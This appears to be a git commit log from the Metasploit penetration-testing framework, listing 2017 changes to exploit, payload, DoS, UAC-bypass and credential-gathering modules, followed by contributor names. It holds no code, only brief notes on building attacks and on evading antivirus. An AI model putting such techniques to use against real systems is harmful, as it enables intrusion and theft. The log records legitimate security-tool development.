Fix EXITFUNC back to process for the RCE too
2017-10-05 11:38:08 -04:00
4729c885f1
Cleanup the CVE-2017-8464 LPE module
2017-10-05 11:10:37 -04:00
d0ebfa1950
Change the template technicque to work as an LPE
2017-10-05 10:30:28 -04:00
825ad940e6
Update the advanced option names and a typo
2017-10-05 10:16:31 -04:00
482ce005fd
Update the advanced option names and a typo
2017-10-05 10:11:00 -04:00
7400082fdb
Land #9040 , Add CVE and Vendor article URL to the denyall_waf_exec module
2017-10-04 09:12:48 -05:00
110f3c9b4a
Add cve and vendor article to the denyall_waf_exec module
2017-10-04 12:11:58 +03:00
10dafdcb12
Fix #9036 , broken refs in bypassuac_comhijack
...
Each ref needs to be an individual array.
2017-10-03 13:36:29 -05:00
9ff6efd3a3
Remove broken link
2017-10-02 20:43:55 +05:30
fc66683502
fixes #8928
2017-10-01 19:49:32 -04:00
e3326e1649
Use send_request_cgi instead of raw
2017-10-01 02:15:43 +02:00
701d628a1b
Features for selecting the target
2017-10-01 02:04:10 +02:00
f2f48cbc8f
Update the CVE-2017-8464 module
2017-09-30 18:25:16 -04:00
a676f600d6
fixes to more modules
2017-09-30 15:45:52 -04:00
8a49a639a0
check file exists before reading
2017-09-29 22:34:38 -04:00
7fc9be846a
bcoles suggestions
2017-09-29 20:29:30 -04:00
8af2e5a7ee
Cleanup revshell for zos
...
remove unused code, extra comments
align code, etc. no functionality changes
2017-09-29 18:27:29 -05:00
9ae8bdda1c
Added Bind Shell JCL Payload for mainframe
...
The bind shell is the companion payload to the reverse_shell_jcl
payload for the mainframe platform.
2017-09-29 16:52:36 -05:00
9b75ef7c36
Land #8343 , qmail Shellshock module
2017-09-29 00:28:30 -05:00
daedf0d904
Clean up module
2017-09-29 00:27:22 -05:00
6cc5324e5b
oe is all umlaut
2017-09-28 19:52:02 -04:00
3a1a437ac7
Rubocop Stlye
2017-09-28 23:53:45 +02:00
40c58e3017
Function for selecting the target host
2017-09-28 23:43:59 +02:00
cc98e80002
Change arch to ARCH_X64
2017-09-28 20:50:18 +02:00
2295146dcd
working optionsbleed module
2017-09-27 22:07:57 -04:00
997b831b52
implement regexes
2017-09-27 19:33:50 -04:00
41e3895424
remove checks for hardcoded name
2017-09-27 07:41:06 +02:00
0649d0d356
wip optionsbleed
2017-09-26 22:09:07 -04:00
579342c4f6
Land #8955 , Fix error messages on telnet_encrypt_overflow.rb
2017-09-26 16:08:58 -05:00
66d6ac418a
Land #8978 , Add smb1 scanner
2017-09-26 16:06:41 -05:00
cad36ee14e
Land #8952 , suhosin compatibility added to staged payload
2017-09-26 15:22:36 -05:00
b10d6b8b63
Land #9001 , SSLVersion consolidation for modules
2017-09-25 15:53:18 -05:00
98ae054b06
Land #8931 , Node.js debugger exploit
2017-09-25 14:00:13 -05:00
7924667e51
appease alignists
2017-09-25 09:10:10 -05:00
62ee4ed708
update modules to use inherited SSLVersion option
2017-09-25 09:03:22 -05:00
1ee590ac07
Move over to rex-powershell and version bump
...
Version bump for:
- https://github.com/rapid7/rex-powershell/pull/10
- https://github.com/rapid7/rex-powershell/pull/11
2017-09-25 13:45:06 +01:00
273d49bffd
Land #8891 login scanner for Inedo BuildMaster
2017-09-24 13:30:17 -04:00
4d1e51a0ff
Land #8906 RCE for supervisor
2017-09-24 08:03:30 -04:00
48188e999e
post/windows/manage/persistence_exe: fix service creation
...
Fixes service creation when in post/windows/manage/persistence_exe
2017-09-23 23:48:50 +02:00
9528f279a5
cleaned up version, and docs
2017-09-23 10:51:52 -04:00
e4f79879ba
Update and rename modules/auxiliary/dos/ibm_lotus_notes.rb to modules/auxiliary/dos/http/ibm_lotus_notes.rb
2017-09-23 18:27:50 +05:30
e8eeb784e4
Land #8960 , spelling/grammar fixes part 3
2017-09-22 18:51:31 -05:00
8de6fa79c1
Tweakz, yo.
2017-09-22 18:49:09 -05:00
d56fffcadf
Land #8974 , spelling/grammar fixes part 4. Finished.
2017-09-22 14:59:28 -05:00
f1be6b720b
Tweaky bits.
2017-09-22 13:38:06 -05:00
669b6771e3
Update ibm_lotus_notes.rb
2017-09-22 17:16:42 +05:30
a71edb33be
Create ibm_lotus_notes.rb
2017-09-22 17:08:05 +05:30
ddbff6ba3c
Land #8980 unauth RCE for denyAll WAF
2017-09-21 21:41:33 -04:00
3d543b75f5
Fixing typos and replacing double quotes with single
2017-09-21 23:48:12 +03:00
1031d7960a
Moving token extraction to the seperated function
2017-09-20 10:23:32 +03:00
5a62e779aa
Land #8954 , fix internal usage of bindata objects when generating NTP messages
2017-09-19 09:01:49 -05:00
ee969ae8e5
Adding DenyAll RCE module
2017-09-19 14:53:37 +03:00
c953842c96
Added docs and additional dialects
2017-09-18 15:02:38 -05:00
7d07f7054d
Merge remote-tracking branch 'origin/master' into add_smb1_scanner
2017-09-18 13:16:06 -05:00
d07fe2f1e7
Added reporting back, removed wfw dialect
2017-09-18 13:15:19 -05:00
08dea910e1
pbarry-r7 comments
2017-09-17 19:38:43 -04:00
c90f885938
Finished spelling issues
2017-09-17 16:00:04 -04:00
d5362333e2
Land #8958 , Add Disk Pulse Enterprise web server buffer overflow
2017-09-15 13:34:22 -05:00
6f5eb5a18f
update
2017-09-15 12:07:28 -05:00
e651bc1205
Land #8951 , Hwbridge auto padding fix and flowcontrol
2017-09-15 08:33:17 -05:00
4e81a68108
Simplify saving valid credentials by calling store_valid_credential
2017-09-15 00:18:33 -05:00
e88b766276
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into add_smb1_scanner
2017-09-14 17:00:45 -05:00
646dda7958
Add initial smbv1 scanner code
2017-09-14 16:59:39 -05:00
c77cb51d64
add newline
2017-09-14 18:26:11 +02:00
a992a3c427
Land #8774 , Post module for gather Docker credentials
2017-09-14 10:15:03 -05:00
200a1b400a
Remove spaces to appease msftidy.
2017-09-14 09:28:38 -05:00
30f833f684
80 pages left
2017-09-13 22:03:34 -04:00
52385f4d9e
fix formatting to fit rubocop
2017-09-13 11:46:57 -05:00
b8c40a9d95
Clean up formatting
2017-09-13 11:13:33 -05:00
3c204f91ef
Correct module title
2017-09-13 11:02:13 -05:00
65f2ee9109
added generate_seh_record
2017-09-13 10:56:32 -05:00
7db506887b
Add exploit code
2017-09-13 10:36:36 -05:00
eb0d174987
Add disk_pulse_enterprise_get module
2017-09-13 10:19:24 -05:00
a07f7c9f42
Land #8520 , Linux post module to find and collect TOR hidden service configurations
2017-09-12 13:39:18 -05:00
27a517e0f6
Fix #8060 , cf #8061
2017-09-12 18:41:51 +02:00
a7a17c677c
fix internal usage of bindata objects when generating NTP messages
2017-09-12 09:54:09 -04:00
86726978ed
payload size updated
2017-09-12 19:23:31 +05:30
e4465c9350
Fixed a bug where flowcontrol caused the first packet to get lost
2017-09-11 19:00:53 -07:00
b218cc3c7f
Merge branch 'master' into hw_auto_padding_fix
2017-09-11 18:30:34 -07:00
ad9329993d
Added better padding and flowcontrol support.
2017-09-11 18:20:57 -07:00
7b87915e1f
Land #8923 , Add additional error checking to mssql_clr_payload module
2017-09-11 17:39:33 -05:00
a58552daad
Land #8825 , Handle missing util.pump in nodejs shell payloads
2017-09-11 15:32:21 -05:00
5f66b7eb1a
Land #8940 , @h00die's second round of desc fixes
...
One ninja edit along the way as well.
2017-09-11 13:05:13 -05:00
cfbd3c1615
Fix spelling of Honeywell
2017-09-11 13:02:18 -05:00
ba880d1a85
Changes to mssql_clr_payload error handling based on code review
2017-09-10 14:15:39 -05:00
2966fb7c8c
Accept @shawizard suggestion for formatting msg_body
2017-09-10 11:23:52 -07:00
861f4a6201
Changes to buildmaster_login from code review
...
Use peer property in messages instead of rhost rport combination for consistency.
Documentation updated accordingly.
2017-09-09 18:00:04 -05:00
47adfb9956
Fixes from code review to buildmaster_login
...
Per bcoles, the most important fixes are:
- Removing `self.class` from call to `register_options`
- Adding rescue to login_succeeded to handle bad json
2017-09-09 16:26:01 -05:00
7339658ba9
224 pages of spelling issues left
2017-09-09 09:52:08 -04:00
6289cc0b70
Merge branch 'spellin' of https://github.com/h00die/metasploit-framework into spellin
2017-09-08 22:20:39 -04:00
0910c482a9
35 pages of spelling done
2017-09-08 22:19:55 -04:00
8f864c27e3
Land #8924 , Add Apache Struts 2 REST Plugin XStream RCE
2017-09-08 13:59:52 -05:00
54a62976f8
update versions and add quick module docs
2017-09-08 13:59:29 -05:00
978fdb07b0
Comment out PSH target and explain why
...
I hope we can fix the PSH target in the future, but the Windows dropper
works today, and you can specify a custom EXE if you really want.
2017-09-08 13:41:06 -05:00
c91ef1f092
Land #8768 , Add Docker Daemon TCP exploit module
2017-09-08 12:50:00 -05:00
2ebf53b647
Minor tweaks...
2017-09-08 10:04:47 -05:00
00c593e0a2
55 pages of spelling done
2017-09-07 21:18:50 -04:00
a9a307540f
Assign cmd to entire case and use encode for XML
...
Hat tip @acammack-r7. Forgot about that first syntax!
2017-09-07 19:36:08 -05:00
8f1e353b6e
Add Apache Struts 2 REST Plugin XStream RCE
2017-09-07 19:30:48 -05:00
a0181a4d54
Land #8831 , Add Maven post-exploitation credential extraction module
...
Merge remote-tracking branch 'upstream/pr/8831' into upstream-master
2017-09-08 00:37:03 +02:00
7e9d0b3e9b
Fix permissions in docker priv_esc module
...
The previous command didn't give the original user enough permissions
to execute the payload. This was resulting in permission denied
and preventing me from getting a root shell.
Fixes #8937
2017-09-07 16:48:02 -05:00
c67e407c9c
Land #8880 , added Cisco Smart Install (SMI) scanner
2017-09-07 08:06:03 -05:00
accb77d268
Add PSH (Binary) as a target to web_delivery
2017-09-07 10:55:29 +01:00
9877a61eff
bump payloads
2017-09-07 01:36:25 -05:00
816e78b6f6
First pass of named pipe code for pivots
2017-09-07 01:33:53 -05:00
5d009c8d0b
remove dead code
2017-09-06 23:21:56 -07:00
048316864c
remove redundant return
2017-09-06 23:01:13 -07:00
97d08e0da4
fix reviewer comments
2017-09-06 22:53:02 -07:00
d71f7876b8
initial commit of nodejs debugger eval exploit
2017-09-06 22:29:24 -07:00
96f7012fe7
Code clean up (URLs, ordering and printing)
2017-09-06 13:17:28 +01:00
b884705a93
regsvr32_applocker_bypass_server -> web_delivery
2017-09-06 12:35:52 +01:00
e7b4cb71b1
Add PSH-Proxy to multi/script/web_delivery
2017-09-06 12:27:04 +01:00
be66ed8af3
Land #8788 exploits for Gh0st and PlugX malware controllers
2017-09-05 20:42:07 -04:00
44fb059cea
Add error checking to mssql_clr_payload
...
Additional error checking had been added to exploits/windows/mssql/mssql_clr_payload
If an error is encountered when changing the trustworthy or clr setting, the exploit fails with a message.
2017-09-05 18:48:22 -05:00
b0dc44fb86
Land #8909 , Avoid saving some invalid creds
2017-09-05 12:43:03 -05:00
d05c401866
modules cleanup and add docs
2017-09-04 20:57:23 -04:00
6051a1a1c1
Land #8910 , Use meta redirect instead of JS redirect in 2 modules
2017-09-01 13:50:02 -05:00
86db2a5771
Land #8888 from @h00die, with two extra fixes
...
Fixes spelling and grammar in a bunch of modules. More to come!
2017-08-31 14:37:02 -05:00
8a045e65aa
Spaces between commas
2017-08-31 14:29:23 -05:00
642a13e820
Out out damn tick
2017-08-31 14:29:05 -05:00
86ee77ffb0
add aarch64 nops and fix aarch64 cmdstager
2017-08-31 18:48:58 +08:00
195c1e041f
Update payload specs and sizes
...
Adds the new Aarch64 and R payloads
fix merge
2017-08-31 18:48:56 +08:00
7b71f60ea1
fix the stack
2017-08-31 18:35:18 +08:00
26f4fa3b09
setup stack
2017-08-31 18:35:17 +08:00
a2396991f0
stager not setting up stack
2017-08-31 18:35:17 +08:00
6dbe00158f
fix stager
2017-08-31 18:35:17 +08:00
49173818fd
Addresses #8674
...
This type of redirection will work without javascript being enabled.
Modules:
multi/browser/firefox_xpi_bootstrapped_addon
multi/browser/itms_overflow
More info on the meta element:
https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta
2017-08-30 23:16:46 -05:00
2bbba9c500
Avoid some ActiveRecord validation errors.
...
Per discussion with @bcoles in [PR 8759](https://github.com/rapid7/metasploit-framework/pull/8759#issuecomment-325028479 ), setting a login data's last_attempted_at value while also setting the status to UNTRIED will cause a validation error when there's a running+connected MSF DB.
This PR removes the handful of existing cases we're doing this (thx, @bcoles!).
2017-08-30 15:31:36 -05:00
eec5d2ada9
Update description and add link to SIET
2017-08-30 11:52:11 -07:00
3b745bd17c
Rework the bash, redirect stdout/err to /dev/null
...
Dont need the -
2017-08-30 03:49:30 +01:00
9387a765e5
Fix msftidy warns/errs
2017-08-30 03:10:46 +01:00
4934023fa5
Use alternate system() payload, dont worry about restarts
...
Use nohup and & to background the meterpreter process
2017-08-30 03:10:46 +01:00
d53f10554d
Configurable restart command
2017-08-30 03:10:46 +01:00
d0ff2694b3
Restart after payload process ends
2017-08-30 03:10:46 +01:00
aee44e3bd2
Working meterpreter exploit
...
No service restart
2017-08-30 03:10:46 +01:00
7cfb5fcc97
Rename
2017-08-30 03:10:46 +01:00
8b67b710fa
Add template
2017-08-30 03:10:46 +01:00
202c936868
Land #8826 , git submodule remote command execution
2017-08-29 18:11:32 -05:00
46eeb1bee0
update style
2017-08-29 17:44:39 -05:00
d5124fdc94
Land #8759 , Add TeamTalk Gather Credentials auxiliary module
2017-08-29 13:17:28 -05:00
39299c0fb8
randomize submodule path
2017-08-29 16:54:08 +08:00
c9e32fbb18
Remove last_attempted_at
2017-08-29 05:05:04 +00:00
a40429158f
40% done
2017-08-28 20:17:58 -04:00
1e8edb377f
Land #8873 , cleanup enable_rdp, add error handling
2017-08-28 05:50:42 -05:00
582b2e238e
update mettle payload to 0.2.2, add background and single-thread http comms
2017-08-28 05:31:44 -05:00
15ec40f5c6
update R cached sizes
2017-08-28 05:31:42 -05:00
bd7ea1f90d
more updates, 465 more pages to go
2017-08-26 21:01:10 -04:00
7dfde651ea
Add login scanner module for Inedo BuildMaster
...
This module attempts to log into BuildMaster. BuildMaster is an application release automation tool.
More information about BuildMaster:
http://inedo.com/
2017-08-26 17:56:53 -05:00
a8067070f2
Fix typo
2017-08-26 17:52:11 +02:00
924c3de9f3
Land #7382 , BIND TSIG DoS
2017-08-26 10:42:35 -05:00
f9a2c3406f
Clean up module
2017-08-26 10:41:10 -05:00
3420633f29
@NickTyrer corrected my correction
2017-08-26 08:43:10 -04:00
801e3e2d68
Replace REXML with Nokogiri and try to cross id with mirror/repository tag
2017-08-25 18:28:09 +02:00
abaf80f3df
jmartin improvements (iter on keys + save as credentials)
2017-08-25 18:15:24 +02:00
32a4436ecd
first round of spelling/grammar fixes
2017-08-24 21:38:44 -04:00
8f17d536a7
Update phpmailer_arg_injection.rb
...
Removed second parameter as it was not necessary. Only changed needed was to change "send_request_cgi" to "send_request_cgi!"
2017-08-24 00:29:28 -06:00
c49b72a470
Follow 301 re-direct
...
I found that in some cases, the trigger URL cannot be accessed directly. For example, if the uploaded file was example.php, browsing to "example.php" would hit a 301 re-direct to "/example". It isn't until hitting "/example" that the php is executed. This small change will just allow the trigger to follow one 301 redirect.
2017-08-23 18:53:54 -06:00
821121d40b
Land #8871 , improve compatibility and speed of JDWP exploit
2017-08-23 18:53:47 -05:00
cba4d36df2
provide missing bits for R platform
2017-08-23 16:58:48 -05:00
4c285c0129
Land #8827 , QNAP Transcode Server RCE
2017-08-22 23:07:01 -05:00
7b18c17445
Appease rubocop
2017-08-22 14:53:21 -07:00
128949217e
more osx
2017-08-22 16:48:09 -05:00
2969da3d70
Merge branch 'upstream-master' into feature/cisco-smi-scanner
2017-08-22 14:39:44 -07:00
bb120962aa
more osx support
2017-08-22 14:01:48 -05:00
7263c7a66e
add 64-bit, osx support
2017-08-22 13:51:28 -05:00
be2739d335
Transform loots into creds
2017-08-22 11:57:51 +02:00
33f2ebc2aa
code cleanup
2017-08-21 22:46:30 -05:00
58e332cc7c
only fail if the group sids fail to resolve and we actually have to add a user
2017-08-21 22:36:40 -05:00
e01caac9ed
removing slice operators from jdwp_debugger
2017-08-21 16:36:54 -05:00
031f48725f
add missing quotes
2017-08-21 16:16:03 -05:00
edbe8d73c2
Revert "Revert passive stance for multi/handler"
...
This reverts commit 66a4ea4f0b
2017-08-21 16:14:23 -05:00
c14daf3fcc
Land #8857 , Reverse and bind shells in R
2017-08-21 15:49:24 -05:00
605330faf6
Land #8842 , add linux/aarch64/shell_reverse_tcp
2017-08-21 15:44:28 -05:00
430251b8f6
fix compatibility with php meterpreter
2017-08-21 15:37:31 -05:00
2873a899db
Address msftidy complaint
2017-08-21 03:39:03 -04:00
d6d6c67f33
add stage_shell.s and cleanup
2017-08-21 14:42:30 +08:00
e1a7494724
linux payloads should default to /bin/sh
2017-08-21 12:25:27 +08:00
9768a89bcd
aarch64 staged shell
2017-08-21 11:14:42 +08:00
7ab097a784
Unix cmd versions of R payloads
...
Use R to connect back from a unix shell.
Notes:
We need to DRY this up - tons of copy pasta here, when we should
really be instantiating the language specific payloads and just
wrapping them with CLI execution strings.
Testing:
None, yet, just did the quick port to wrap this and push to CI
now that rex-arch #4 is in.
2017-08-20 21:25:57 -04:00
f961495860
Land #8625 , Remove OpenSSL from Windows Meterp, packet header changes, and TLV packet encryption
2017-08-20 19:13:51 -05:00
b864083cbd
update payload sizes
2017-08-20 19:03:53 -05:00
eabe4001c2
Land #8492 , Add IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution module
2017-08-20 18:48:22 -05:00
cbd7790e95
Land #8751 , Add Asterisk Gather Credentials auxiliary module
2017-08-20 18:34:27 -05:00
07ee33578d
Land 8804, tidy up mdaemon credential extraction module
2017-08-20 18:26:56 -05:00
85df247c84
DRY up module, fix remaining style violations
2017-08-20 18:24:41 -05:00
367c760927
window move is now directly in the template
2017-08-20 17:48:59 -05:00
e734a7923a
Land #8267 , Handle multiple entries in PSModulePath
2017-08-20 17:44:30 -05:00
1225555125
remove unnecessary require
2017-08-20 17:37:42 -05:00
840c0d5f56
Land #7808 , add exploit for VMware VDP with known ssh private key (CVE-2016-7456)
2017-08-20 17:36:45 -05:00
88f39d924b
Land #8816 , added Jenkins v2 cookie support
2017-08-20 14:58:38 -05:00
f7dc831e9a
Land #8799 , Add module to detect Docker, LXC, and systemd-nspawn containers
2017-08-20 14:45:57 -05:00
aa797588e8
Land #8847 , Look for sp_execute_external_script in mssql_enum
2017-08-20 14:32:35 -05:00
2eba188166
Land #8789 , Add COM class ID hijack method for bypassing UAC
2017-08-20 13:57:17 -05:00
e8ab518d76
Land #8853 , Revert passive stance for multi/handler
2017-08-19 22:04:26 -05:00
d76616e8e8
Reverse and bind shells in R
...
Initial implementation of bind and reverse TCP shells in R.
Supports IPv4 and 6, provides stateless sessions which wont change
the cwd when cd is invoked since each command invocation actually
spawns a pipe to execute that specific line's invocation.
R injections are common in academic software written in a hurry by
students or lab administrators. The language runtimes are also
commonly found adjacent to valuable data, and often used by teams
which are not directly responsible for information security.
Testing:
Local testing with netcat bind and rev handlers.
TODO:
Add the appropriate platform/language library definitions
2017-08-19 06:12:05 -04:00
6ecdb8f2cc
Land #8852 , convert quest_pmmasterd_bof to cmd_interact/find
2017-08-18 13:20:17 -05:00
66a4ea4f0b
Revert passive stance for multi/handler
...
It's gotten to be a bit annoying. ExitOnSession=false was good, but this
was too much. Typing run -j isn't difficult.
2017-08-18 13:16:12 -05:00
cde319a5ec
Optim module and add doc
2017-08-18 19:30:41 +02:00
b529c3551c
Remove unused variable
2017-08-18 19:00:32 +02:00
dc358dd087
unknow to unknown
2017-08-18 11:33:48 -04:00
d659cdc8f6
Convert quest_pmmasterd_bof to cmd_interact/find
2017-08-18 00:19:09 -05:00
ea5370486f
minor unused variable fixes
2017-08-17 16:46:51 -04:00
9c196041ce
update youtube urls in post exploit module
2017-08-17 16:44:35 -04:00
8b4ccc66c7
add linux/aarch64/shell_reverse_tcp
2017-08-17 18:55:37 +08:00
e642789674
Look for sp_execute_external_script in mssql_enum
...
sp_execute_external_script can be used to execute code in MSSQL.
MSSQL 2016+ can be configured to execute R code. MSSQL 2017 can
be configured to execute Python code.
Documentation:
https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql
https://docs.microsoft.com/en-us/sql/advanced-analytics/tutorials/rtsql-using-r-code-in-transact-sql-quickstart
Interesting uses of sp_execute_external_script:
R - https://pastebin.com/zBDnzELT
Python - https://gist.github.com/james-otten/63389189ee73376268c5eb676946ada5
2017-08-16 21:40:03 -05:00
f07318c976
Fix post/linux/gather/hashdump NoMethodError
2017-08-16 00:56:32 -07:00
70a82b5c67
Land #8834 , add resiliency to x64 linux reverse_tcp stagers
2017-08-15 08:04:32 -04:00
df98c2a3dd
update cached sizes again
2017-08-15 08:02:51 -04:00
debbc31142
use separate module names for x86 and x64 generators
2017-08-15 08:02:01 -04:00
4dbf94556e
update CacheSize
2017-08-15 12:54:30 +09:00
ac976eee8e
Add author
2017-08-15 03:27:40 +00:00
e3265c4b1b
Land #8697 , fix oracle_hashdump and jtr_oracle_fast modules
2017-08-14 17:36:18 -04:00
69c4ae99a7
Land #8811 , fix peer printing with bruteforce modules
2017-08-14 17:31:48 -04:00
b4055a8071
Rename command
2017-08-14 23:26:18 +02:00
55db70ec3e
Handle case when locate is not here by using enum_directories_map
2017-08-14 23:25:01 +02:00
1a4db844c0
Refactor build_brute_message for legacy printing
2017-08-14 11:17:34 -05:00
b8f56d14e0
Land #8698 , Add HEADERS to php_eval module
2017-08-14 09:54:22 -04:00
27822c2ccf
Add Maven creds module
2017-08-14 14:59:59 +02:00
9fdf2ca1f4
Land #8830 , Cleanup auxiliary/scanner/msf/msf_rpc_login
2017-08-14 02:47:08 -04:00
fa4fae3436
Cleanup auxiliary/scanner/msf/msf_rpc_login
2017-08-14 06:34:04 +00:00
59086af261
Land #8771 , rewrite linux x64 stagers with Metasm
2017-08-14 02:32:29 -04:00
26193216d1
Land #8686 , add 'download' and simplified URI request methods to http client mixin
...
Updated PDF author metadata downloader to support the new methods.
2017-08-14 01:40:17 -04:00
7d4561e0fd
rename to download_log to avoid conflicting with the mixin
2017-08-14 01:10:37 -04:00
5d05ca154a
added http client 'download' method and updates to pdf author module from @bcoles
2017-08-14 01:08:53 -04:00
0a374b1a88
Add QNAP Transcode Server Command Execution exploit module
2017-08-13 09:13:56 +00:00
25764397ba
Update CachedSizes for changed nodejs payloads
...
Fixes test failures
2017-08-12 23:21:54 -07:00
7881a7ddc4
git submodule command exec
2017-08-13 11:47:44 +08:00
ecfe3d0235
added optional DoublePulsar check
2017-08-11 11:36:59 -06:00
bb5fffebc4
Land #8796 , SMBLoris Denial of Service Module.
2017-08-09 16:24:55 -05:00
901a1fdd1b
Minor tweaks.
2017-08-09 15:44:32 -05:00
1b6acd768e
Land #8817 , fixing @jhart-r7's ruby 2.2 blunder
2017-08-09 13:19:20 -07:00
1b6b29c22b
fix error with rdp scanníng
2017-08-09 21:32:15 +02:00
7e860571ae
fix bug where api_token auth was being used without token being set
2017-08-09 12:30:26 -04:00
9bb102d72d
add jenkins v2 cookie support
2017-08-09 12:29:31 -04:00
dd79aa3afb
Land #8627 , Add post module multi/gather/jenkins
2017-08-09 10:43:21 -05:00
0ac19087cd
Land #8720 , add resiliency (retries + sleep) to linux x86 stagers
2017-08-08 19:36:47 -05:00
3396afb41a
Add IP and port (peer) to print_brute messages
2017-08-08 15:46:40 -05:00
39e59805f9
Fix annoying print_brute messages in ssh_login
2017-08-08 15:15:23 -05:00
67e86da50b
make SMBLoris run continuously as requested
...
as per ZeroSum's request the module now runs
continuously, refreshing the connections on every pass
until manually killed
2017-08-08 10:16:16 -05:00
2fab8f5d2a
Fix Spaces at EOL
2017-08-07 16:39:16 -04:00
663824de85
Fix indentation, fix how locations adds values and remove unnecesary code
2017-08-07 13:16:27 -04:00
cfd377fbd4
Support padding on the CAN bus.
...
Also use a hash for passing options around instead of individual params.
2017-08-06 18:05:59 -05:00
b8d794cc37
Identify systemd-nspawn containers in checkcontainer
...
Check the value of the "container" environment variable:
- "lxc" indicates a LXC container
- "systemd-nspawn" indicates a systemd nspawn container
2017-08-06 00:46:09 -05:00
9858147dae
Add module to detect Docker and LXC containers
...
Detect Docker by:
- Presence of .dockerenv file.
- Finding "docker" in /proc/1/cgroup
Detect LXC by:
- Finding "lxc" in /proc/1/cgroup
2017-08-05 18:59:36 -05:00
2383afd8dc
Fix improved error handling
2017-08-04 23:42:44 +02:00
289f03241b
add module documentation
...
add module docs for the new smbloris DoS
2017-08-04 16:10:44 -05:00
15cc2a9dc0
removedthreading stuff, tried keepalives
...
still seem to be topping out at
about 1.3GB allocated
2017-08-04 15:28:01 -05:00
7ce813ae6e
Land #8767 , Add exploit module for CVE-2017-8464
...
LNK Code Execution Vulnerability
2017-08-03 17:10:16 -05:00
da3ca9eb90
update some documentation
2017-08-03 17:09:44 -05:00
e73ffe648e
tried adding supervisor model to smbloris
...
tried to overcome issues with slowdown
around the 4500 connection mark by using the
supervisor pattern to terminate the threads on
the backend. this seems to get us further, but we still
hit a slowdown and the allocations die out before
we hit any serious usage
2017-08-03 14:19:35 -05:00
c9da2d56b9
first pass at SMBLoris DoS module
...
the first pass on the DoS module for SMBLoris
running into issues with it topping out around 600MB
2017-08-03 11:32:57 -05:00
ddd841c0a8
code style cleanup + add automatic targeting based on payload
2017-08-03 00:27:54 -05:00
b62429f6fa
handle drive letters specified like E: nicely
2017-08-03 00:27:22 -05:00
46ec04dd15
Removed This PC ItemID & increased timeout in WaitForSingleObject
...
Remove the This PC ItemID to bypass (some) AV.
Timeout for WaitForSingleObject is set to 2,5s. After this timeout a
mutex is released allowed a new payload to be executed.
2017-08-02 15:47:22 -05:00
e51e1d9638
Added new DLL templates to prevent crashing of Explorer
2017-08-02 15:47:21 -05:00
mr_me
Pearce Barry
Nicholas Starke
Ryan Knell
Chris Higgins
Tod Beardsley
Austin
William Webb
William Vu
Brent Cook
Yorick Koster
wetw0rk
Jacob Robles
Zenofex
nromsdahl
Brendan Coles
Tim W
bwatters-r7
vipzen
WhiteWinterWolf
Adam Cammack
attackdebris
Jon Hart
Matthew Kienow
Daniel Teixeira
h00die
David Maloney
Martin Pizala
Mehmet İnce
0xFFFFFF
Steven Patterson
Patrick Webster
RootUp
Maurice Popp
Spencer McIntyre
Jeffrey Martin
EgiX
lvarela-r7
sho-luv
Steven Patterson
Brent Cook
mumbai
caleBot
Kent Gruber
Hanno Heinrichs
itsmeroy2012
Wei Chen
root
Wei Chen
peewpw
jakxx
ashish gahlot
bigendiansmalls
Christian Mehlmauer
g0tmi1k
Jannis Pohl
loftwing
james
Erik Lenoir
Anant Shrivastava
Craig Smith
james
Patrick Thomas
dmohanty-r7
James Barnett
OJ
Calum Hutton
Jon P
n00py
Louis Sato
RageLtMan
Richard Claus
tkmru
zerosum0x0
thesubtlety
Agora Security